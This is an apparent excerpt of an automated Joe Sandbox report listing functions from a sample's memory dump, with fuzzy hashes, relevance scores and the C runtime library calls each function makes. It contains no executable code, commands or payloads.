Function 0495CA10 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 33748cab75dd02cd9c9af25f8559c98b679b04174cf877650eb24b1b4ef813c4
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: A8C18CB5E003599FCB54CFA9C881ADEFBF1FF48204F24856AE919E7201E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 04955DE7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction ID: 1e0057d3ca8fd4a9e2544ba62ae18804fae2e4c731feb743e86eda310cdffeb2
Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
Instruction Fuzzy Hash: D7B184A0039FA696CBD3FF30911024BF7E0BFC525DF44094AD99986864EB3EE94E9215

Uniqueness

Uniqueness Score: -1.00%

Function 04957520 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction ID: c1cf8f7fbb71ba35e52e02f3c8ecc644e602b1ced22a96c6ec45d974cc9594fe
Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
Instruction Fuzzy Hash: 54912673D187BA06D7609EAF8C441B9B7E3AFC4210F9B0776DD9467242C9309E0697D0

Uniqueness

Uniqueness Score: -1.00%

Function 0495C760 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction ID: 133bbd5be666066ede13fb0b6139561458398a07018b0972b17ad0ddccea8e74
Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction Fuzzy Hash: 8BB169B5E002599FCB84CFE9C885ADEFBF0FF48210F64916AD919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 0495A916 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction ID: 87d1ee91e77dadaf7fee1173fd0f61b3963d18f104d96e0b8bc3b553e770d61a
Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
Instruction Fuzzy Hash: FE71D473A20B254B8314DEB98D94192F2F1EF84610B57C27CCE84D7B41EB31B95A96C0

Uniqueness

Uniqueness Score: -1.00%

Function 049559F7 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction ID: 6acfca8adb9a0bceafd3b73361bf3c497a6a50291d095d6a13855bb3df612aa8
Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
Instruction Fuzzy Hash: CD8137B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83B41D770F8558B92

Uniqueness

Uniqueness Score: -1.00%

Function 04958E60 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction ID: 797404dae1f1307a44ec0f07f59b3a37696f0c468c506d9e83ae4f6133b8f331
Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
Instruction Fuzzy Hash: 82711722535B7A06EBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4D77A4

Uniqueness

Uniqueness Score: -1.00%

Function 0495A699 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction ID: 166188c8303d8bf96d882194cb54171f38a73e3b353a330433bed2782097dd39
Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
Instruction Fuzzy Hash: 5C813375A10B669BD714CF2AD8C046AFBF1BB48210B618B2ADCA583B40D334F565DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04959120 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction ID: 0bae78ec9a5d111de482fa418f6481a284d913add06f7f99097db506e756e176
Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
Instruction Fuzzy Hash: EC61A3739046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04957A80 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction ID: daa4260c806f0da4cfe0f9a4860fe3f15874a8325bd41ac71ff9730d27e30dd9
Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
Instruction Fuzzy Hash: D2618C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4

Uniqueness

Uniqueness Score: -1.00%

Function 04957880 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction ID: 56388329b08bc851e1099c50989b62d52814213d4fd5d626edea3c2176e67f0d
Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
Instruction Fuzzy Hash: B451DD229257B945EBC3DA3D88504AEBBE0BE49206B460557DCD0B3181C72EDE4DB7E4

Uniqueness

Uniqueness Score: -1.00%

Function 04957220 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 048B671C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, Offset: 048B5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b5000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: e866a4ff2aae77cfa773ff98569c0ddd573f386863c768c2cbf11b30f854beff
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: E73158758062459FDB15CE70D890AE5BB70EF87324F189B9CD4C1DB202E325604AD7D6

Uniqueness

Uniqueness Score: -1.00%

Function 049570E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82

Uniqueness

Uniqueness Score: -1.00%

Function 04957393 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction ID: beaf3b6ed919fa0409890d2ec468347f995787a1d5ce891581978b0095be8b37
Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction Fuzzy Hash: 573115305183419FD741EF69D480A4BF7E4FFC8258F11D969F98897221D730E984CB62

Uniqueness

Uniqueness Score: -1.00%

Function 049718D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 47d7929f82a491594faf4fa991cd7ed97f78a8be357d7b4947ddd0a5688fb734
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8C11C87734114283D7188A2EF5B65B6E7ADEBC632172D437AD1824B75ED122F247A700

Uniqueness

Uniqueness Score: -1.00%

Function 0495B000 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: 56f31790b06b9219a7dbaa09626c1e58524f3a1045b048dd60058af6af7c5c15
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: 22113D0A8492C4BDCF424A7840E56EBEFA98E2B218F5A71DA88C44B753D01B150FE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0495A79A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction ID: 7784b613d2ef4cb963850271056fb986c9578fc50deb8b86b1595d71ae499873
Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction Fuzzy Hash: D30128769106629BD700DF3EC8C045AFBF1BB082117528B3ADC9483A41D334F662DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 04976437 Relevance: 18.1, APIs: 12, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 0497644E

Part of subcall function 04979636: __calloc_impl.LIBCMT ref: 04979645

__calloc_crt.LIBCMT ref: 04976472
_free.LIBCMT ref: 04976480
__calloc_crt.LIBCMT ref: 0497648E
_free.LIBCMT ref: 0497649E
_free.LIBCMT ref: 049764A4
__copytlocinfo_nolock.LIBCMT ref: 049764B3
__setmbcp_nolock.LIBCMT ref: 049764D4
_free.LIBCMT ref: 049764E2
___removelocaleref.LIBCMT ref: 049764E9
___freetlocinfo.LIBCMT ref: 049764F0
_free.LIBCMT ref: 049764F6

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 90afa7b474c6d78396a126bc66aacd896c3ffe230cf23a7dde164c8b3fbfbe6e
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 3221DE31244A01EFFB353F65CC02E1B7BE9EF81778B50843AE484555A0EA22F940DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04973F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04973F51

Part of subcall function 04975BA8: __getptd_noexit.LIBCMT ref: 04975BA8

__gmtime64_s.LIBCMT ref: 04973FEA
__gmtime64_s.LIBCMT ref: 04974020
__gmtime64_s.LIBCMT ref: 0497403D
__allrem.LIBCMT ref: 04974093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049740AF
__allrem.LIBCMT ref: 049740C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049740E4
__allrem.LIBCMT ref: 049740FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04974119
__invoke_watson.LIBCMT ref: 0497418A

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 013ad5c5cb5da0c9d1050a906872e28d21e2d42beeacf61da743575513806b79
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 5271E871A40716ABF724AE7DCC41B6AB3BDAF503A8F148239E914D7681E770F9048BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0497650E Relevance: 16.6, APIs: 11, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 04976547
__calloc_crt.LIBCMT ref: 04976598
__lock.LIBCMT ref: 049765AE
__copytlocinfo_nolock.LIBCMT ref: 049765BF
_wcscmp.LIBCMT ref: 049765F9
__lock.LIBCMT ref: 04976610
__updatetlocinfoEx_nolock.LIBCMT ref: 04976622
___removelocaleref.LIBCMT ref: 04976628
__updatetlocinfoEx_nolock.LIBCMT ref: 04976647

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 3480d626416549495bf24596e4c63c02aef1ff75ed8cab8f24cd2945ff55fe83
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: AA41F272904708AFFB00AFA4DD85B9E3BE9EF84338F10843DE91496191DB75BA44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 049784AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 049784B1
_free.LIBCMT ref: 049784E2
_free.LIBCMT ref: 049784F5
_free.LIBCMT ref: 04978513
_free.LIBCMT ref: 04978525
_free.LIBCMT ref: 04978536
_free.LIBCMT ref: 04978541
_free.LIBCMT ref: 04978565
_free.LIBCMT ref: 04978581
_free.LIBCMT ref: 04978597
_free.LIBCMT ref: 049785BF

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: a338970be9adf68481d89fe59175b61a7387a0d953cdf8cdc243d8236af9dd92
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: A831C131900250DFDF25AF14FC8888977A8FB54724704867BEA04573B0CBB4B9C9AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0499FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0499FC1F

Part of subcall function 0498169C: std::exception::_Copy_str.LIBCMT ref: 049816B5

__CxxThrowException@8.LIBCMT ref: 0499FC34
std::exception::exception.LIBCMT ref: 0499FC4D
__CxxThrowException@8.LIBCMT ref: 0499FC62
std::regex_error::regex_error.LIBCPMT ref: 0499FC74

Part of subcall function 0499F914: std::exception::exception.LIBCMT ref: 0499F92E

__CxxThrowException@8.LIBCMT ref: 0499FC82
std::exception::exception.LIBCMT ref: 0499FC9B
__CxxThrowException@8.LIBCMT ref: 0499FCB0

Strings

leM, xrefs: 0499FCA8

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 385ccaf4f4ff0c364b7170cf47ce1143ec4fe60cb334f39cf52d3757d6100915
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: B511FE79C0020DBBCF00FFA9D45ACDEBBBCAA44344F408576AD5497240EB74B7498B94

Uniqueness

Uniqueness Score: -1.00%

Function 0495F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0495F01F

Part of subcall function 04971602: __FF_MSGBANNER.LIBCMT ref: 04971619
Part of subcall function 04971602: __NMSG_WRITE.LIBCMT ref: 04971620

_malloc.LIBCMT ref: 0495F02B
_wprintf.LIBCMT ref: 0495F03E
_free.LIBCMT ref: 0495F044
_free.LIBCMT ref: 0495F065
_malloc.LIBCMT ref: 0495F06D
_sprintf.LIBCMT ref: 0495F0C0
_wprintf.LIBCMT ref: 0495F0D2
_wprintf.LIBCMT ref: 0495F0DC
_free.LIBCMT ref: 0495F0E5

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: faeccca05228e6b04540e29e513977d06c3f3bf683fc3487350100089f514c47
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 8711E4B29005546BE761A7B55C12EFF7BDC9F85716F0800BAFF8CD1280DA19BA0493B1

Uniqueness

Uniqueness Score: -1.00%

Function 04961960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 049619C6
__CxxThrowException@8.LIBCMT ref: 049619F1
__CxxThrowException@8.LIBCMT ref: 04961A1A
__CxxThrowException@8.LIBCMT ref: 04961A4B
_memset.LIBCMT ref: 04961A6A
__CxxThrowException@8.LIBCMT ref: 04961A90
_malloc.LIBCMT ref: 04961AA0
_memset.LIBCMT ref: 04961AAB
_sprintf.LIBCMT ref: 04961ACE

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 417fdd564349ec26acfb67ed14f0b5561fe0710572514ed27352016433fb6927
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: BE513A71D40209ABEB11EFA5DC86FEFBBB8FB44744F100139F905B6190E7746A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0495F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0495F284
__CxxThrowException@8.LIBCMT ref: 0495F2AF
__CxxThrowException@8.LIBCMT ref: 0495F2DE
__CxxThrowException@8.LIBCMT ref: 0495F30F
_memset.LIBCMT ref: 0495F32E
__CxxThrowException@8.LIBCMT ref: 0495F354
_sprintf.LIBCMT ref: 0495F373

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 25af9e3b7b79802922305d2ad2b4f1caf48f56eeec33b3b1219bda2fa8abc2fc
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 5B5160B1E40209AAEF11DFA5DC46FEFBB78EB44744F200039F905B6190E775AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0495F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0495F4B7
__CxxThrowException@8.LIBCMT ref: 0495F4E2
__CxxThrowException@8.LIBCMT ref: 0495F504
__CxxThrowException@8.LIBCMT ref: 0495F535
_memset.LIBCMT ref: 0495F554
__CxxThrowException@8.LIBCMT ref: 0495F57A
_sprintf.LIBCMT ref: 0495F594

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: aa6e2d505926e27a1f31a5914e6212ecb01dc53655535b2e32d787a0a8343b48
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 7D514171D40209AAEF11DFA5DC46FFFBBB8EB44714F200139F905B6190E6747A068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0499208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 049920C6
__invoke_watson.LIBCMT ref: 04992120
_strlen.LIBCMT ref: 049920D4

Part of subcall function 04975BA8: __getptd_noexit.LIBCMT ref: 04975BA8

_strnlen.LIBCMT ref: 0499215F
__lock.LIBCMT ref: 04992170
__getenv_helper_nolock.LIBCMT ref: 0499217B

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 09599dc9f9057eab07f6b19089eebfe682964fe8a29f4b24acff457b16a9aedf
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: E031EA32A40211BBFF217BAC9C05BAE37D89F85B28F1548B5E904DF280DB74BD5087A1

Uniqueness

Uniqueness Score: -1.00%

Function 04A166D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 04A166DD

Part of subcall function 049759BF: __calloc_crt.LIBCMT ref: 049759E2
Part of subcall function 049759BF: __initptd.LIBCMT ref: 04975A04

